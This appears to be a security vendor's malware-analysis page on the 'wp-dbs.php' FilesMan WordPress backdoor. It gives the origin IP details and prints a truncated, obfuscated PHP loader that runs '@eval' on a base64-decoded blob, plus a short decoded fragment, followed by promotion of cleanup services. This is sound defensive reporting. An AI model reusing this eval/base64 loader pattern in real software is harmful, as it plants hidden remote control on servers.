wp-dbs.php - WordPress Backdoor (FilesMan)

The wp-dbs.php backdoor is know to infect WordPress websites by adding malicious PHP files to the server, allowing hackers to modify files on the server, running server commands, database queries etc.

A free PHP obfuscation tool called FOPO has been used to hide the code from malware and virus scanners. One of the recent variants of this malware is known to be created on Saturday, March 31st, 2018 at 17:12 UTC from IP 78.129.137.28

Details for 78.129.137.28

  • IP: 78.129.137.28
  • Hostname: tor.slashsrv.com
  • ISP: Iomart Hosting Limited
  • Organization: RapidSwitch
  • Services: Confirmed proxy server, Tor exit node
  • Recently reported forum spam source. (207)

Code Dump

<?php 
/* 
Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/ 
This code was created on Saturday, March 31st, 2018 at 17:12 UTC from IP 78.129.137.28 
Checksum: 2c1447b5c382300091d258ccc7739863cf112199 
*/ 
$lc19ce2f="\x62\141\163\145\66\x34\137\144\145\143\157\x64\145";@eval($lc19ce2f( 
"Ly9OTitOOFUva0ZWT2ZXWlhNWWFCRU5jdkM3N3JleDBUd0c1c25wOTZIdWdkRERuZ2VoZ0RTSWlrWlJ 
iNk5OeVpic05VTDdtMGhJTXo5NVFuZDRCQitGSkJNS0V6V3NtZ2hvd2R3anptSzYweFkvTUVIbnJLdHp 
qWWEwZWZmQ1ppUmp2UmRxbDJTN1VhdGFSTmFob0Q1OS9FRjk5NVRxTXQ1K3Z6ZzBZeDVURzFoQ0owOTV

De-Coded Malware

<?php
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'UTF-8';
Clean My Hacked Website Now

Website Malware Cleanup Website Malware Cleanup

Have you been hacked? Do you need help with fixing your website? We provide professional malware cleanup services to get your business back online quickly.

Removal of Security Warnings Removal of Security Warnings

If your website is hacked, your visitors may be shown a warning message. Astra will take the necessary steps to remove your website from the blacklists ASAP.

Astra Website Firewall (WAF) Website Firewall (WAF)

Stop future website hacks with Astra WAF & protect your website. No hassle out-of-the-box security tailored to your technology stack & CMSs like WordPress, Magento, Opencart etc.

Real Human Support Real Human Support

Astra's team of security engineers guide you through your security journey. We believe in customers first, so no waiting in long queues to get your queries answered.

This information is provided as part of the Astra community project. All information should be considered as-is, without guarantees. All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to [email protected]

Astra Pro Plan
$228/year
Get Started
Malware Cleanup (12h)
Rock-solid Website Firewall
Automatic Malware Scanner
Bad Bot Protection
Blacklist Monitoring
File Upload Scanning
IP & Country Blocking
GDPR Consent Tool